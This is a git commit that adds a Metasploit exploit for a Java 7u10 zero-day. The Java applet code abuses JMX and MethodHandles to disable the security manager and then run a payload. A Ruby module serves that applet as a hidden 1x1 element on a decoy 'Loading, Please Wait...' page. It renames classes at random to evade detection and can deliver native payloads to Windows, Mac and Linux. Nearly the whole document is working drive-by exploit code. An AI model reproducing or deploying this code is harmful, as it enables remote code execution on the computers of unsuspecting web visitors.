added exploit for j7u10 0day
parent
d0478eb73f
commit
876d889d82
Binary file not shown.
Binary file not shown.
|
@ -0,0 +1,19 @@
|
|||
import java.security.AccessController;
|
||||
import java.security.PrivilegedExceptionAction;
|
||||
|
||||
public class B
|
||||
implements PrivilegedExceptionAction
|
||||
{
|
||||
public B()
|
||||
{
|
||||
try
|
||||
{
|
||||
AccessController.doPrivileged(this); } catch (Exception e) {
|
||||
}
|
||||
}
|
||||
|
||||
public Object run() {
|
||||
System.setSecurityManager(null);
|
||||
return new Object();
|
||||
}
|
||||
}
|
|
@ -0,0 +1,73 @@
|
|||
import java.io.ByteArrayOutputStream;
|
||||
import java.io.IOException;
|
||||
import java.io.InputStream;
|
||||
import java.io.ObjectInputStream;
|
||||
import java.io.ObjectOutputStream;
|
||||
import metasploit.Payload;
|
||||
import java.lang.Runtime;
|
||||
import java.applet.Applet;
|
||||
import com.sun.jmx.mbeanserver.JmxMBeanServer;
|
||||
import com.sun.jmx.mbeanserver.JmxMBeanServerBuilder;
|
||||
import com.sun.jmx.mbeanserver.MBeanInstantiator;
|
||||
import java.lang.invoke.MethodHandle;
|
||||
import java.lang.invoke.MethodHandles;
|
||||
import java.lang.invoke.MethodType;
|
||||
import java.lang.reflect.Method;
|
||||
|
||||
|
||||
public class Exploit extends Applet
|
||||
{
|
||||
|
||||
public Exploit()
|
||||
{
|
||||
}
|
||||
|
||||
|
||||
public void init()
|
||||
{
|
||||
try
|
||||
{
|
||||
ByteArrayOutputStream bos = new ByteArrayOutputStream();
|
||||
byte[] buffer = new byte[8192];
|
||||
int length;
|
||||
|
||||
// read in the class file from the jar
|
||||
InputStream is = getClass().getResourceAsStream("B.class");
|
||||
// and write it out to the byte array stream
|
||||
while( ( length = is.read( buffer ) ) > 0 )
|
||||
bos.write( buffer, 0, length );
|
||||
// convert it to a simple byte array
|
||||
buffer = bos.toByteArray();
|
||||
|
||||
JmxMBeanServerBuilder localJmxMBeanServerBuilder = new JmxMBeanServerBuilder();
|
||||
JmxMBeanServer localJmxMBeanServer = (JmxMBeanServer)localJmxMBeanServerBuilder.newMBeanServer("", null, null);
|
||||
MBeanInstantiator localMBeanInstantiator = localJmxMBeanServer.getMBeanInstantiator();
|
||||
ClassLoader a = null;
|
||||
Class localClass1 = localMBeanInstantiator.findClass("sun.org.mozilla.javascript.internal.Context", a);
|
||||
Class localClass2 = localMBeanInstantiator.findClass("sun.org.mozilla.javascript.internal.GeneratedClassLoader", a);
|
||||
MethodHandles.Lookup localLookup = MethodHandles.publicLookup();
|
||||
MethodType localMethodType1 = MethodType.methodType(MethodHandle.class, Class.class, new Class[] { MethodType.class });
|
||||
MethodHandle localMethodHandle1 = localLookup.findVirtual(MethodHandles.Lookup.class, "findConstructor", localMethodType1);
|
||||
MethodType localMethodType2 = MethodType.methodType(Void.TYPE);
|
||||
MethodHandle localMethodHandle2 = (MethodHandle)localMethodHandle1.invokeWithArguments(new Object[] { localLookup, localClass1, localMethodType2 });
|
||||
Object localObject1 = localMethodHandle2.invokeWithArguments(new Object[0]);
|
||||
MethodType localMethodType3 = MethodType.methodType(MethodHandle.class, Class.class, new Class[] { String.class, MethodType.class });
|
||||
MethodHandle localMethodHandle3 = localLookup.findVirtual(MethodHandles.Lookup.class, "findVirtual", localMethodType3);
|
||||
MethodType localMethodType4 = MethodType.methodType(localClass2, ClassLoader.class);
|
||||
MethodHandle localMethodHandle4 = (MethodHandle)localMethodHandle3.invokeWithArguments(new Object[] { localLookup, localClass1, "createClassLoader", localMethodType4 });
|
||||
Object localObject2 = localMethodHandle4.invokeWithArguments(new Object[] { localObject1, null });
|
||||
MethodType localMethodType5 = MethodType.methodType(Class.class, String.class, new Class[] { byte[].class });
|
||||
MethodHandle localMethodHandle5 = (MethodHandle)localMethodHandle3.invokeWithArguments(new Object[] { localLookup, localClass2,"defineClass", localMethodType5 });
|
||||
Class localClass3 = (Class)localMethodHandle5.invokeWithArguments(new Object[] { localObject2, null, buffer });
|
||||
localClass3.newInstance();
|
||||
|
||||
Payload.main(null);
|
||||
//Runtime.getRuntime().exec("calc.exe");
|
||||
}
|
||||
catch(Throwable ex)
|
||||
{
|
||||
//exception.printStackTrace();
|
||||
}
|
||||
}
|
||||
|
||||
}
|
|
@ -0,0 +1,18 @@
|
|||
# rt.jar must be in the classpath!
|
||||
|
||||
CLASSES = \
|
||||
Exploit.java \
|
||||
B.java
|
||||
|
||||
.SUFFIXES: .java .class
|
||||
.java.class:
|
||||
javac -source 1.2 -target 1.2 -cp "../../../../data/java" $*.java
|
||||
|
||||
all: $(CLASSES:.java=.class)
|
||||
|
||||
install:
|
||||
mv Exploit.class ../../../../data/exploits/j7u10_jmx/
|
||||
mv B.class ../../../../data/exploits/j7u10_jmx/
|
||||
|
||||
clean:
|
||||
rm -rf *.class
|
|
@ -0,0 +1,122 @@
|
|||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
require 'rex'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpServer::HTML
|
||||
include Msf::Exploit::EXE
|
||||
|
||||
include Msf::Exploit::Remote::BrowserAutopwn
|
||||
autopwn_info({ :javascript => false })
|
||||
|
||||
def initialize( info = {} )
|
||||
|
||||
super( update_info( info,
|
||||
'Name' => 'Java Applet JMX Remote Code Execution',
|
||||
'Description' => %q{
|
||||
This module abuses the JMX classes from a Java Applet to run arbitrary Java
|
||||
code outside of the sandbox as exploited in the wild in January of 2013. The
|
||||
vulnerability affects Java version 7u10 and earlier.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' => [ 'egypt', 'sinn3r', 'juan vazquez' ],
|
||||
'References' => [
|
||||
[ 'URL', 'http://malware.dontneedcoffee.com/2013/01/0-day-17u10-spotted-in-while-disable.html' ],
|
||||
[ 'URL', 'http://labs.alienvault.com/labs/index.php/2013/new-year-new-java-zeroday/' ]
|
||||
],
|
||||
'Platform' => [ 'java', 'win', 'osx', 'linux' ],
|
||||
'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Generic (Java Payload)',
|
||||
{
|
||||
'Platform' => ['java'],
|
||||
'Arch' => ARCH_JAVA,
|
||||
}
|
||||
],
|
||||
[ 'Windows x86 (Native Payload)',
|
||||
{
|
||||
'Platform' => 'win',
|
||||
'Arch' => ARCH_X86,
|
||||
}
|
||||
],
|
||||
[ 'Mac OS X x86 (Native Payload)',
|
||||
{
|
||||
'Platform' => 'osx',
|
||||
'Arch' => ARCH_X86,
|
||||
}
|
||||
],
|
||||
[ 'Linux x86 (Native Payload)',
|
||||
{
|
||||
'Platform' => 'linux',
|
||||
'Arch' => ARCH_X86,
|
||||
}
|
||||
],
|
||||
],
|
||||
'DefaultTarget' => 0,
|
||||
'DisclosureDate' => 'Jan 10 2013'
|
||||
))
|
||||
end
|
||||
|
||||
|
||||
def setup
|
||||
path = File.join(Msf::Config.install_root, "data", "exploits", "j7u10_jmx", "Exploit.class")
|
||||
@exploit_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
|
||||
path = File.join(Msf::Config.install_root, "data", "exploits", "j7u10_jmx", "B.class")
|
||||
@loader_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
|
||||
|
||||
@exploit_class_name = rand_text_alpha("Exploit".length)
|
||||
@exploit_class.gsub!("Exploit", @exploit_class_name)
|
||||
super
|
||||
end
|
||||
|
||||
def on_request_uri(cli, request)
|
||||
print_status("handling request for #{request.uri}")
|
||||
|
||||
case request.uri
|
||||
when /\.jar$/i
|
||||
jar = payload.encoded_jar
|
||||
jar.add_file("#{@exploit_class_name}.class", @exploit_class)
|
||||
jar.add_file("B.class", @loader_class)
|
||||
metasploit_str = rand_text_alpha("metasploit".length)
|
||||
payload_str = rand_text_alpha("payload".length)
|
||||
jar.entries.each { |entry|
|
||||
entry.name.gsub!("metasploit", metasploit_str)
|
||||
entry.name.gsub!("Payload", payload_str)
|
||||
entry.data = entry.data.gsub("metasploit", metasploit_str)
|
||||
entry.data = entry.data.gsub("Payload", payload_str)
|
||||
}
|
||||
jar.build_manifest
|
||||
|
||||
send_response(cli, jar, { 'Content-Type' => "application/octet-stream" })
|
||||
when /\/$/
|
||||
payload = regenerate_payload(cli)
|
||||
if not payload
|
||||
print_error("Failed to generate the payload.")
|
||||
send_not_found(cli)
|
||||
return
|
||||
end
|
||||
send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })
|
||||
else
|
||||
send_redirect(cli, get_resource() + '/', '')
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
def generate_html
|
||||
html = %Q|<html><head><title>Loading, Please Wait...</title></head>|
|
||||
html += %Q|<body><center><p>Loading, Please Wait...</p></center>|
|
||||
html += %Q|<applet archive="#{rand_text_alpha(8)}.jar" code="#{@exploit_class_name}.class" width="1" height="1">|
|
||||
html += %Q|</applet></body></html>|
|
||||
return html
|
||||
end
|
||||
|
||||
end
|
Loading…
Reference in New Issue